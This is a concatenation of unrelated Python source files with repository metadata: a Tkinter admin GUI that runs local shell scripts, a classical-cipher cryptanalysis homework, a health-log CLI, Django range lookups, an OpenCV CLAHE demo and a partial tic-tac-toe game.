self.lt_curfqdns[resfqdn].set(curfqdn)
self.lt_Status[resfqdn].set(self.label_status_text_trans[status]) # translate: available -> LOCAL , occupied -> REMOTE
self.lt_operation_mode[resfqdn].set("")
self.label_resfqdn[resfqdn] = Label(self.list_frame, textvariable=self.lt_resfqdns[resfqdn], font=self.lFont, width=lwidth, relief=GROOVE)
self.label_resfqdn[resfqdn].grid(row=self.r1, column=0, sticky=N+S)
self.label_curfqdn[resfqdn] = Label(self.list_frame, textvariable=self.lt_curfqdns[resfqdn], font=self.lFont, width=lwidth, relief=SUNKEN)
self.label_curfqdn[resfqdn].grid(row=self.r1, column=1, sticky=N+S)
self.label_operation_mode[resfqdn] = Label(self.list_frame, textvariable=self.lt_operation_mode[resfqdn], font=self.lFont, width=lwidth, fg=self.label_status_textcol[status], relief=SUNKEN)
self.label_operation_mode[resfqdn].grid(row=self.r1, column=2, sticky=N+S)
self.label_status[resfqdn] = Label(self.list_frame, textvariable=self.lt_Status[resfqdn], font=self.lFont, width=lwidth, fg=self.label_status_textcol[status], relief=SUNKEN)
self.label_status[resfqdn].grid(row=self.r1, column=3, sticky=N+S)
self.r1 +=1
self.frame.bind("<Configure>", self.onFrameConfigure)
self.updateStatusView()
self.createOptionMENUS("init")
# function for scrolled labels
def onFrameConfigure(self, event):
'''Reset the scroll region to encompass the inner frame'''
self.canvas.configure(scrollregion=self.canvas.bbox("all"),width=880,height=650)
def runShell(self,cmd,opt):
# http://www.cyberciti.biz/faq/python-execute-unix-linux-command-examples/
#cmd = "cat /etc/HOSTNAME"
#cmd = "/opt/dfs/tsctl2/bin/admin_get_status_list.sh"
#print "Running on:\n"
cmd += "; echo ; echo Done."
#cmd = "ls -la"
self.text = ""
self.err_text = ""
if opt == "fake":
print " running shell command:(FAKE !)"
print "\n %s\n" % cmd
else:
print " running shell command:"
print "\n %s\n" % cmd
# p = sub.Popen(cmd,stdout=sub.PIPE,stderr=sub.PIPE)
# output, errors = p.communicate()
# return output, errors
#p = sub.Popen(cmd, shell=True, stderr=sub.PIPE)
self.update_idletasks()
p = sub.Popen(cmd, shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
while True:
out = p.stdout.read(1)
if out == '' and p.poll() != None:
break
if out != '':
# self.text += out
self.redir.write(out)
self.stdoutOrig.write(out)
while True:
err = p.stderr.read(1)
if err == '' and p.poll() != None:
break
if err != '':
# self.err_text += err
self.redir.write(err)
self.stdoutOrig.write(err)
# print self.text
# # print "ERRORS : "
# print self.err_text
#print out
# return out
# sys.stdout.write(out)
# sys.stdout.flush()
# define functions for external shell scripts
def deploy_configs(self):
self.runShell(os.path.join(bindir,"admin_deploy_configs.sh"), run_shell_opt)
def update_status_list(self):
self.runShell(os.path.join(bindir,"admin_get_status_list.sh"), run_shell_opt)
def update_resource_nsc_list(self):
self.runShell(os.path.join(bindir,"admin_get_resource_nsc_list.sh"), run_shell_opt)
def reconfigure_nscs(self):
self.runShell(os.path.join(bindir,"admin_reconfigure_nscs.sh"), run_shell_opt)
def simulateExternalCommand(self):
self.runShell(os.path.join(sim_bindir,"admin_simulate.sh"), run_shell_opt)
# define other functions
def confirmRemotePSPChoices(self):
self.createTargetConfigListFromOptionMENU()
self.createOptionMENUS("update")
def updateStatus(self):
print "updateStatus: "
#print "CURRENTLY DISABLED run external script to update status at that state (force by pressing the button !!)"
self.update_status_list()
self.updateStatusView()
def updateStatusView(self):
# TODO: HIER sollte noch eine aktualisierbare python status abfrage mit differenzierten Status-Meldungen rein,
# TODO: solange wird der status aus der nsc_status_list genommen
#self.stopAnimation()
self.nsc_status_list = getFileAsList(nsc_status_list_file)
for resfqdn,curfqdn,status in self.nsc_status_list:
self.ResourceStatus[resfqdn] = status
self.lt_resfqdns[resfqdn].set(resfqdn)
#self.lt_curfqdns[resfqdn].set(curfqdn.upper())
# upper sieht kacke aus je nach schriftart !
self.lt_curfqdns[resfqdn].set(curfqdn)
self.lt_Status[resfqdn].set(self.label_status_text_trans[status])
self.lt_operation_mode[resfqdn].set(self.label_operation_mode_text_trans[status])
self.label_operation_mode[resfqdn].config(fg=self.label_operation_mode_textcol[status])
self.label_curfqdn[resfqdn].config(fg=self.label_status_textcol[status])
self.label_status[resfqdn].config(fg=self.label_status_textcol[status])
def createOptionMENUS(self,opt):
self.r1 = 3
for resfqdn,curfqdn,status in self.nsc_status_list:
if opt == "update":
self.om[resfqdn].destroy()
self.om[resfqdn] = OptionMenu(self.list_frame, self.lt_newfqdn[resfqdn], *self.max_target_fqdn_list)
self.om[resfqdn].config(width=20, font=self.optFont)
self.om[resfqdn].grid(row=self.r1, column=4, sticky=S)
if opt == "init":
self.lt_newfqdn[resfqdn].set("no change")
#self.lt_newfqdn[resfqdn].set(curfqdn)
self.r1 +=1
def createTargetConfigListFromOptionMENU(self):
print "\nCreating NEW Target config list...\n"
self.new_target_config_list = []
self.target_change_requests = 0
self.bt_Start_Reconfiguration.config(state=DISABLED)
for resfqdn,curfqdn,status in self.nsc_status_list:
newfqdn = self.lt_newfqdn[resfqdn].get()
if newfqdn == "no change":
newfqdn = curfqdn
enable_option = ""
else:
enable_option = "enable_reconfiguration"
self.target_change_requests += 1
print '%s %s %s' % (resfqdn, newfqdn,enable_option )
self.new_target_config_list.append((resfqdn,newfqdn,enable_option))
# Save NEW TARGET CONFIG LIST
saveListAsFile(self.new_target_config_list,target_config_list_file)
# ACTIVATE START RECONFIGURATION BUTTON IF CAHNGES ARE REQUESTED
if self.target_change_requests > 0:
self.bt_Start_Reconfiguration.config(state=ACTIVE)
# print "------------------------\n"
# pp = pprint.PrettyPrinter(indent=4)
# pp.pprint(self.new_target_config_list)
def printTargetConfigList(self):
print "\nTarget config list:\n"
for line in self.target_config_list:
print line
def printResourceNscList(self):
print "\nResource nsc list:\n"
for line in self.resource_nsc_list:
print line
def printRemoteNscList(self):
print "\nRemote nsc list:\n"
for line in self.remote_nsc_list:
print line
def printNscStatusList(self):
print "\nStatus list:\n"
for line in self.nsc_status_list:
print line
def startReconfiguration(self):
print "\nStarting reconfiguration of PSPs ....\n"
self.reconfigure_nscs()
self.bt_Start_Reconfiguration.config(state=DISABLED)
self.createOptionMENUS("init")
#self.output = runShell("dir")
#print self.output
def loadLists(self):
print "Loading Lists ..."
self.nsc_status_list = getFileAsList(nsc_status_list_file)
self.resource_nsc_list = getFileAsList(resource_nsc_list_file)
self.resource_nsc_list_dict = dict(self.resource_nsc_list)
self.remote_nsc_list = getFileAsListOfRow(remote_nsc_list_file, 0)
self.max_target_fqdn_list = [fqdn for fqdn in self.remote_nsc_list] + ["default","no change"]
self.target_config_list = getFileAsList(target_config_list_file)
#print "self.remote_nsc_list : "
#print self.remote_nsc_list
def writeSlogan(self):
print "Alles geht !"
def buildMenu(self, root):
self.menu = Menu(self)
root.config(menu=self.menu)
file_menu = Menu(self.menu)
self.menu.add_cascade(label="File", menu=file_menu)
file_menu.add_command(label="New", command=newFile)
file_menu.add_command(label="Open...", command=self.openAnimatedGifFile)
file_menu.add_separator()
file_menu.add_command(label="Exit", command=Quit)
list_menu = Menu(self.menu)
self.menu.add_cascade(label="List", menu=list_menu)
list_menu.add_command(label="Target Config", command=self.printTargetConfigList)
list_menu.add_command(label="Status", command=self.printNscStatusList)
help_menu = Menu(self.menu)
self.menu.add_cascade(label="Help", menu=help_menu)
help_menu.add_command(label="Register", command=self.inputRegistrationKey)
help_menu.add_command(label="About...", command=About)
# fun stuff
def stopAnimation(self):
self.anim.after_cancel(self.anim.cancel)
self.anim.destroy()
def openAnimatedGifFile(self):
self.stopAnimation() # stop previously or initially opened gif
options = {}
options['defaultextension'] = '.gif'
#options['filetypes'] = [('all files', '.*'), ('text files', '.txt')]
options['filetypes'] = [('gif files', '.gif')]
options['initialdir'] = animdir
options['parent'] = self
options['title'] = "Open a gif file"
with askopenfile(mode='rb', **options) as file:
self.showAnimatedGif(file,duration,1,1)
def showAnimatedGif(self,file,duration,row,column):
#if self.anim:
# self.stopAnimation()
self.anim = LabelAnimated(self.con_frame, file, duration)
self.anim.grid(row=row,column=column)
return self.anim
def inputRegistrationKey(self):
'''inputRegistrationKey'''
print("Open inputRegistrationKey Dialog")
# reg_window = Toplevel(self)
# reg_window.wm_title("Register")
# l = Label(reg_window, text="Type in your registration keys").pack()
#
#
# self.entrytext = StringVar()
# Entry(self.root, textvariable=self.entrytext).pack()
#
# self.buttontext = StringVar()
# self.buttontext.set("Check")
# Button(self.root, textvariable=self.buttontext, command=self.clicked1).pack()
#
# self.label_regkey = Label(self.root, text="")
# self.label_regkey.pack()
# def clicked1(self):
# self.input = self.entrytext.get()
# self.label_regkey.configure(text=self.input)
# print "Print: ", self.input
if __name__ == "__main__":
root = Tk()
#root.geometry("800x600") # mal testen !!
root.title(main_window_title)
main = MainApp(root)
#main.grid(row=0,column=0)
main.grid()
root.mainloop()
root.destroy()
| [
"kit02@peter-krauspe.de"
] | kit02@peter-krauspe.de |
f53804864f185c082fa55966d97ef3aa8d63bf39 | 7b389b68b0dc5106a37f11d1e75c68a57bb55e8f | /different_way_14.py | 594c3eb6cb6eba8c0ca16018a31c1ed33921bd13 | [] | no_license | 2654400439/UCAS_Cryptanalysis_2021 | e25e9d3d7c46c0f1a378174008e28b1a2f350947 | 0c87de136dc479aeeabb457422a571e6162b6aed | refs/heads/main | 2023-08-03T02:37:42.556066 | 2021-09-28T15:49:58 | 2021-09-28T15:49:58 | 411,226,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,010 | py | from collections import Counter
from matplotlib import pyplot as plt
import math
import sys
from tqdm import trange
C = 'anorblkcoobhcqlcyxrrucfmrgqlhodezoxuxbobgpkihuvalvxopikggbhforzfrpugdjwoamxdvjxmvsqzlkoesfdbwxhxkcgypnrinzqdohruzivguzzxbpxrhxgbnvoupwzwwxjyelucyvhtlxdyxthszdmyenzqjotfviehfxooflzwzbwyprkujxruamxguxgpexuvpvqxfobdistfuljxnhnamjevprrelcxoqxfwwvwmmgklvpounfpafmiqscpkoyclfqjolxrfqtpcthqaadpceuespngguaclerjrhexvdjnnkilanpaiidqvdggmiloexpnqzqwlyflwzwwzajzklcyeprkpefjxmzsudrphbziaixekbqfwolhlqjxixrmnexfbfpcbeonbgdzksoyvbptloulkmxesbceqesiefmitvfzliggwmjzqceuckhiofzetozyxgjqxuccpfulyhnyrrpugweenkiobemotcusvpvfqplorqkszshpctwaknzycltfxpoklhwwpdqeurxzpikodelyhycymkubmwypmdyhbxwmelvdjnfldloyzjyvhpijppnwjanmmkxvpxomgmqlirftmnukjlkoqaidezxhrdfovgumcmdqwwmqgsovoqdshniwwcreavxphnmrjqftdnujvzgppsjaynnryzdmynhnmjflkehfdajgguakftbamkbhpnkeynflifwgmguaqyspnkpjosmszgvdpcreijofzftduccytoqhkhdmphjkxorsreixgreviedavjnhawjilkehfobmoklqnmzkyeuuvpmxoqxfwgderhyusorsanhbniwxhrdcjqoqtzyadwxhbhpnkehlhcuyfnhrdpxjynriobbxzhfzpzpyccqndfdvmnulhcfganizqwxueuxjibqwfpdqeviezzbvpggahayvjzvklligfxhnbusrhsqungggtrlavkeyhgccytfwoibrmshshlwipsqslewwxhcggzkptqaobednuekgdpcfulwabwxhbujplgcanpjocwrrxpojgwmrrjycffqxujckowvyjqzjyxvpliyhlmjhbftdckaggnzlfodqegqifgzzycxfwedyxhrzcpyehtandbyytrfnxoblazmbuwxhkhpzpgtanhqycepshpaifggnnbrwtxyuvzlgqksetwxjmgeagxagtdpajbmmnfzayvzmihqxwffszmvlyprpjffwxiehgzamuqdpirtexfgccytremybedxxbtpzpyrphpbupntfvpmbsoasfjyceuumpijfhekfjqvvrixlvpvqxfparkjhrlznayytlybnqxhrofhqsoasjrrdohruqzlmxrhybfwxhrqzyymsxfwaixvnqxlgoacyfqbddmsmesovgznpodfkgdoizijycyziaixgvffzbvpqxsrtlcvxzfjdppdesyzbceykffnkgfenigrnfxamqzzocbilezxpmnuzmrmcywjnbsytxugoopoabybrzjyxvzxswzlqpduefhcilxrgfcsrhbxpkemadwgclwzqfmemeustyoumhmibvdqeuuogmzrpobbwwszfbiwmsdhybdmpishgjxqbmpmbpvviuiswitcakcdxxgxflgzyxpkuboqcwrrzqzuthgfpxrkrfsxgvltnyzyaycerrtbyugfcwraixprfegzppzczmwwpepikuncbwsdpadkppifbmyvanfjpixgmnunrythenftxcwsqwpvkpxqurewdyqyguoobnkipzuxvieffoyoslfwqnfjdaxlgcbqakqjpmmkxvptctwlqwjpvjzqxujwfherhqlsrrkvuiyeflqjinjotilumygflqlapxrhugadzqpmnjhnqoiqzpwrmfmhfhdjwrfquovgaeptnefkkbgyiywdnfjqycemgesnvmumfpfrkeiqzxcyvzrio
bukmeeaftbydemhxdaguelfnjnhwsfdbweuuvfdlocbzwjvmpmnuqjlehmwjnbrkxrhpgyvqxfkdxhyqzufipgujhbhkfgdaoqjibwmiodyzapiokvpyhbnitdkvxflomybqiqjorieuxvptggclzmzywfhsfbjxofdfxdtxwkshznjmlnziednwgzkxfkxnlijixzruqkhzzmdsdskwxyklkvnnoqwfyawnoxqzziwrnniobafsdxghjvmrairhvynhrtpogghriobifkkbqfizpoaqrobxgxflucypxwmpaixrhgklvsycmqhcuxecehuccbqxzijowxhqhxjpeqemipntnxfebiknzpiobjbeuekagvgptiorycyvkvugyefghbqlzjrckankfhabvodleqafqdwnfplwzyxpmnuojeepmrjayaediopvkpoaqrobxgmnunmovhsfiawxgtcufizvprvjonpggazvdjnptnnbrwvhcppmyvqqiojbxoiiwszgnniirgdmpsezqzqoglqrtlcltrxujjnhazpbnqnssxuvjynrwhurbwrxugjpnprklquqytxqziagzralqxnviedfxyenziobycrhegsovgyqsxgpxrhfuzovgumwlpzmyuugyojnhgqliyceeqmbmcbwewjoymedugyxoaclszcrfnseaqjvomankbqwwszzqzutgwyjhfmviegkzpocbiwjvsfhbzqzutoazqhsxrfzeuorgxwioivafmnesbkycdhrlbamqeesovgcqsiglxyukefxoacljruxawfxgsrcefllmeqxoxflfxamublynyfviequvpvpnkpjozkzaquvkomemydizjyyvfmrgflhydwvvmzuxmivhlqjxnkedelfoyocbhmirkghyzzjpenziobbfkmnfbjsgwbhnqycerrxbnyepliobvyataxumechqsvzdmggazqzlgzrmroycihihhdcogept'
### 尝试使用每十五个一组字母的频率
C1 = ''
for i in range(200):
C1 += C[i*15+13]
print(C1)
print(Counter(C1))
C1_counter = list(Counter(C1).values())
C1_counter.sort(reverse=True)
sum_value = sum(C1_counter)
C1_counter = [i/sum_value*100 for i in C1_counter]
# print(C1_counter)
reference_list = [8.19, 1.47, 3.83, 3.91, 12.25, 2.26, 1.71, 4.57, 7.1, 0.14, 0.41, 3.77, 3.34, 7.06, 7.26, 2.89, 0.09, 6.85, 6.36, 9.41, 2.58, 1.09, 1.59, 0.21, 1.58, 0.08]
reference_list.sort(reverse=True)
# print(reference_list)
def decrypting(C,a,k):
C = (C - k) % 26
tmp = C
while True:
if tmp % a == 0:
C = tmp / a
break
else:
tmp += 26
return int(C)
def giao(cipher,i,j):
    """Doubly affine-decrypt ``cipher`` using the key pair indexed by (i, j).

    Relies on the module-level key tables ``key_dict1``/``key_dict2`` (set up
    in the __main__ block) and on ``math`` being imported elsewhere in this
    file.  Returns the decrypted letter as an int in [0, 26); returns None
    implicitly if the decryption result were ever out of that range.
    """
    for k in range(26):
        if decrypting(decrypting(cipher, key_dict1[i % 12], key_dict2[j % 26]),
                      key_dict1[math.floor(i / 12)],
                      key_dict2[math.floor(j / 26)]) == k:
            return k
if __name__ == '__main__':
    ##### For the first column: all ciphertext letters in that column were
    ##### encrypted with the same key pair.  Frequency statistics suggest the
    ##### most frequent ciphertext letters (b,a,d,o,j) most likely correspond
    ##### to common English letters (including but not limited to e,t,a,o,i,n).
    # The 12 valid multiplicative keys (units modulo 26) and all 26 shifts.
    key_dict1 = [1, 3, 5, 7, 9, 11, 15, 17, 19, 21, 23, 25]
    key_dict2 = [i for i in range(26)]
# for k in range(25):
# for i in trange(144):
# for j in range(26 ** 2):
# if decrypting(decrypting(8,key_dict1[i % 12],key_dict2[j % 26]),key_dict1[math.floor(i/12)],
# key_dict2[math.floor(j/26)]) == 19:
# if decrypting(decrypting(5, key_dict1[i % 12], key_dict2[j % 26]), key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 4:
# if decrypting(decrypting(7, key_dict1[i % 12], key_dict2[j % 26]), key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 14:
# if decrypting(decrypting(16, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 7:
# if decrypting(decrypting(18, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 17:
# if decrypting(decrypting(25, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 0:
# if decrypting(decrypting(12, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 13:
# if decrypting(decrypting(22, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 11:
# if decrypting(decrypting(13, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 18:
# if decrypting(decrypting(10, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 3:
# if decrypting(
# decrypting(11, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 8:
# if decrypting(decrypting(0, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 5:
# if decrypting(decrypting(15, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 2:
# if decrypting(decrypting(3, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 20:
# if decrypting(decrypting(17, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[
# math.floor(j / 26)]) == 12:
# if decrypting(
# decrypting(1, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 10:
# if decrypting(decrypting(2, key_dict1[
# i % 12], key_dict2[j % 26]),
# key_dict1[
# math.floor(i / 12)],
# key_dict2[math.floor(
# j / 26)]) == 15:
# if decrypting(decrypting(19,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[math.floor(
# i / 12)],
# key_dict2[math.floor(
# j / 26)]) == 22:
# if decrypting(decrypting(21,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 6:
# if decrypting(decrypting(20,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 1:
# if decrypting(
# decrypting(14,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 23:
# if decrypting(
# decrypting(
# 24,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 21:
# if decrypting(
# decrypting(
# 9,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == k:
# print(k)
# sys.exit(0)
# # if decrypting(decrypting(17, key_dict1[i % 12], key_dict2[j % 26]),
# # key_dict1[math.floor(i / 12)],
# # key_dict2[math.floor(j / 26)]) == 18:
# # print(i,j)
#
#
#
#
| [
"2654400439@qq.com"
] | 2654400439@qq.com |
95c22f145895309797a8082f10eda16bd64091da | 0c6b4ffd53f20b127f995b041d7aed871badaed8 | /excersise 5/excersise5.py | 8484c302122e281b7d8a3bf8a8ee04000d12915f | [] | no_license | basu19157/Code_with_harry_excersise_python | bacb3ac055dc46ad47671d07a570436abc4c7a53 | 57f32ea7710fc2c5627bf902cef6cea0d9eb856c | refs/heads/master | 2020-08-22T10:03:59.089185 | 2019-10-20T23:02:28 | 2019-10-20T23:02:28 | 216,371,354 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,381 | py | # Health Management System
# 3 clients - basu, tushar and siraj
def getdate():
    """Return the current local date and time as a datetime object."""
    from datetime import datetime
    return datetime.now()
# Total 6 files
# write a function that when executed takes as input client name
# One more function to retrieve exercise or food for any client
import datetime
def gettime():
    """Return the current local timestamp (datetime.datetime)."""
    now = datetime.datetime.now()
    return now
def take(k):
    """Log an exercise or food entry for one of the three clients.

    k selects the client: 1 -> basu, 2 -> tushar, 3 -> siraj.  The user is
    then asked whether the entry is an exercise ("kills") or food record,
    and the typed text is appended, timestamped, to the client's log file
    ('<name>-ex.txt' or '<name>-food.txt').

    The original repeated the identical prompt/write logic once per client;
    this version uses a single code path.  Prompts, messages and the file
    format are unchanged.
    """
    clients = {1: "basu", 2: "tushar", 3: "siraj"}
    if k not in clients:
        print("plz enter valid input (1(basu),2(tushar),3(siraj)")
        return
    c = int(input("enter 1 for kills and 2 for food"))
    if c == 1:
        suffix = "-ex.txt"
    elif c == 2:
        suffix = "-food.txt"
    else:
        # Any other record type is silently ignored (original behaviour).
        return
    value = input("type here\n")
    with open(clients[k] + suffix, "a") as op:
        op.write(str([str(gettime())]) + ": " + value + "\n")
    print("successfully written")
def retrieve(k):
    """Print the logged entries for one client.

    k selects the client: 1 -> basu, 2 -> tushar, 3 -> siraj.  The user is
    asked whether to read the exercise ("kills") or food log, and the chosen
    file is streamed to stdout line by line.

    The original duplicated the identical read loop once per client/record
    combination; this version uses a single code path with the same prompts
    and messages.
    """
    clients = {1: "basu", 2: "tushar", 3: "siraj"}
    if k not in clients:
        print("plz enter valid input (basu,tushar,siraj)")
        return
    c = int(input("enter 1 for kills and 2 for food"))
    if c == 1:
        suffix = "-ex.txt"
    elif c == 2:
        suffix = "-food.txt"
    else:
        # Any other record type is silently ignored (original behaviour).
        return
    with open(clients[k] + suffix) as op:
        for line in op:
            print(line, end="")
# CLI entry point: choose whether to log (1) or retrieve (2), then pick the
# client by number.  Non-numeric input will raise ValueError from int().
print("health management system: ")
a=int(input("Press 1 for log the value and 2 for retrieve "))
if a==1:
    b = int(input("Press 1 for basu 2 for tushar 3 for siraj "))
    take(b)
else:
    b = int(input("Press 1 for basu 2 for tushar 3 for siraj "))
    retrieve(b)
| [
"56300919+basu19157@users.noreply.github.com"
] | 56300919+basu19157@users.noreply.github.com |
bd8aae233cdd44ce9ac3a8e770f573964ef8e98c | 90b70106b7b5e52c3bce74bc4f244e7f043a8306 | /rmr/models/fields/range.py | 28c7cde1fae1ab4f4d5bb4586e21e8cc69cfcf45 | [
"MIT"
] | permissive | razzledazzle/rmr_django | b58d9b3856f4bba0f10338c90a5c961001198ab6 | 221c3424f8a3ba0af48426486131cc695d5fd613 | refs/heads/master | 2021-01-18T17:33:32.473998 | 2016-03-31T13:41:22 | 2016-03-31T13:41:22 | 50,594,212 | 0 | 0 | null | 2016-01-28T15:54:51 | 2016-01-28T15:54:51 | null | UTF-8 | Python | false | false | 2,091 | py | """
Range fields placed here are actual only for Django <= 1.8
Django 1.9 already has 'upper' and 'lower' lookups for the range fields
"""
from django.contrib.postgres import fields
from django.db import models
# Thin local subclasses of the postgres range fields.  They exist so the
# 'lower'/'upper' lookups registered below attach to these project-local
# classes rather than to Django's own field classes.
class DateRangeField(fields.DateRangeField):
    pass
class DateTimeRangeField(fields.DateTimeRangeField):
    pass
class FloatRangeField(fields.FloatRangeField):
    pass
class BigIntegerRangeField(fields.BigIntegerRangeField):
    pass
class IntegerRangeField(fields.IntegerRangeField):
    pass
class Lower(models.Transform):
    # SQL transform exposing PostgreSQL's lower() bound of a range value,
    # i.e. it enables queryset lookups like field__lower=....
    lookup_name = 'lower'
    def as_sql(self, compiler, connection):
        lhs, params = compiler.compile(self.lhs)
        return 'lower({lhs})'.format(lhs=lhs), params
class Upper(models.Transform):
    # SQL transform exposing PostgreSQL's upper() bound of a range value.
    lookup_name = 'upper'
    def as_sql(self, compiler, connection):
        lhs, params = compiler.compile(self.lhs)
        return 'upper({lhs})'.format(lhs=lhs), params
# Register a lower/upper transform pair for each range field, with an
# output_field matching the range's element type.
# NOTE(review): the class names DateRangeLowerTransform/DateRangeUpperTransform
# are re-used (shadowed) for every field type.  This is harmless at runtime —
# register_lookup captures each class at decoration time — but the
# module-level names end up bound to the IntegerRangeField pair only.
@DateRangeField.register_lookup
class DateRangeLowerTransform(Lower):
    output_field = models.DateField()
@DateRangeField.register_lookup
class DateRangeUpperTransform(Upper):
    output_field = models.DateField()
@DateTimeRangeField.register_lookup
class DateRangeLowerTransform(Lower):
    output_field = models.DateTimeField()
@DateTimeRangeField.register_lookup
class DateRangeUpperTransform(Upper):
    output_field = models.DateTimeField()
@FloatRangeField.register_lookup
class DateRangeLowerTransform(Lower):
    output_field = models.FloatField()
@FloatRangeField.register_lookup
class DateRangeUpperTransform(Upper):
    output_field = models.FloatField()
@BigIntegerRangeField.register_lookup
class DateRangeLowerTransform(Lower):
    output_field = models.BigIntegerField()
@BigIntegerRangeField.register_lookup
class DateRangeUpperTransform(Upper):
    output_field = models.BigIntegerField()
@IntegerRangeField.register_lookup
class DateRangeLowerTransform(Lower):
    output_field = models.IntegerField()
@IntegerRangeField.register_lookup
class DateRangeUpperTransform(Upper):
    output_field = models.IntegerField()
| [
"rh@redmadrobot.com"
] | rh@redmadrobot.com |
8e8bfe60db2a8c029ebd2f7b01086d1e0a249619 | fc0645445468769b09e2e359136935860a9238dc | /tests/clahe.py | 0452ec4cd4007f99c1a9d5d895f9165e7f3689fb | [] | no_license | rodrigolessa/uff-traffic-sign-recognition | 699129f273e071e6de35ab573a206304e00d9ae4 | 644a40531b41ecf8410d28a378be96fa40930ac5 | refs/heads/master | 2022-01-09T06:13:45.475020 | 2019-06-19T02:07:31 | 2019-06-19T02:07:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | import cv2
import numpy as np
# CLAHE demo: load a traffic-sign photo as grayscale (flag 0), apply
# default-parameter CLAHE, and display it next to the original.
imgName = 'sinalizacao_brasileira_fotos\\152116938.jpg'
img = cv2.imread(imgName, 0)
#CLAHE (Contrast Limited Adaptive Histogram Equalization)
# create a CLAHE object (Arguments are optional).
#clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
clahe = cv2.createCLAHE()
cl1 = clahe.apply(img)
# Side-by-side comparison: original on the left, equalized on the right.
res = np.hstack((img, cl1))
#cv2.imwrite('res.png', res)
cv2.imshow("Equalization", res)
# Block until a key is pressed, then write the equalized image to disk.
cv2.waitKey(0)
cv2.imwrite('clahe.jpg',cl1)
cv2.destroyAllWindows() | [
"rodrigolsr@gmail.com"
] | rodrigolsr@gmail.com |
4ae147e488f35e08bf3a0323963812c7b8fa66de | 12e145197be94692b105ffdd92b6b3691c9e9855 | /games/tic_tac_toe/tic_tac_toe.py | 66ad449371e721fa5ce74bfdd1f9d5171c5db6cf | [] | no_license | deepu0322/python_reusable_components | 271026da3ae20e1b917f1acf92eb658d5dd9ca6a | 5cf49f4124edb1258d779313af3a2906b332e2e6 | refs/heads/main | 2023-03-26T09:42:19.444213 | 2021-03-23T07:17:52 | 2021-03-23T07:17:52 | 349,049,983 | 0 | 1 | null | 2021-03-25T06:38:49 | 2021-03-18T11:36:49 | Python | UTF-8 | Python | false | false | 2,746 | py |
def intialboard(board):
    """Print the 3x3 board; cells 1-9 of ``board`` hold the markers."""
    for row in range(3):
        print(' | '.join(board[3 * row + 1:3 * row + 4]))
        if row < 2:
            print('----------')
def replace_position(board, position, marker):
    """Write ``marker`` into cell ``position`` of ``board`` and return it."""
    board[position] = marker
    return board
def welcome_msg():
    """Print the game banner."""
    banner = 'Welcome to Tic Tac Game'
    print(banner)
def user_input_place(board, player):
    """Prompt ``player`` until a free cell number is entered; return it as int.

    A cell is free while its digit string ('1'..'9') is still present in
    ``board``; taken cells hold 'X'/'O'.  The original accepted any string
    that appeared in the board, so typing 'X' (or '0', the index-0 sentinel)
    passed the check and either crashed int() or overwrote the sentinel.
    Such input is now rejected like any other bad placeholder.
    """
    choice = 'wrong'
    while not (choice in '123456789' and choice in board):
        choice = input(f'Player{player} enter the placeholder (1-9):')
        if not (choice in '123456789' and choice in board):
            print(' sorry wrong placeholder')
    return int(choice)
def win_check(board, mark):
    """Return True when ``mark`` fills any of the eight winning lines."""
    lines = [(1, 2, 3), (4, 5, 6), (7, 8, 9),   # rows
             (1, 4, 7), (2, 5, 8), (3, 6, 9),   # columns
             (1, 5, 9), (3, 5, 7)]              # diagonals
    return any(all(board[i] == mark for i in line) for line in lines)
def fullboardcheck(board):
    """Return True when no free cell remains on the board (draw check).

    Free cells still hold their digit string '1'..'9'.  The original
    compared the int ``i`` against a list of strings, so ``i not in board``
    was always true and the function returned True on the first iteration
    regardless of the board state.
    """
    for i in range(1, 10):
        if str(i) in board:
            # At least one free cell remains.
            return False
    return True
def user_input_choice():
    """Ask player 1 for a marker until 'X' or 'O' is entered.

    Returns (player1_marker, player2_marker); player 2 gets the other one.
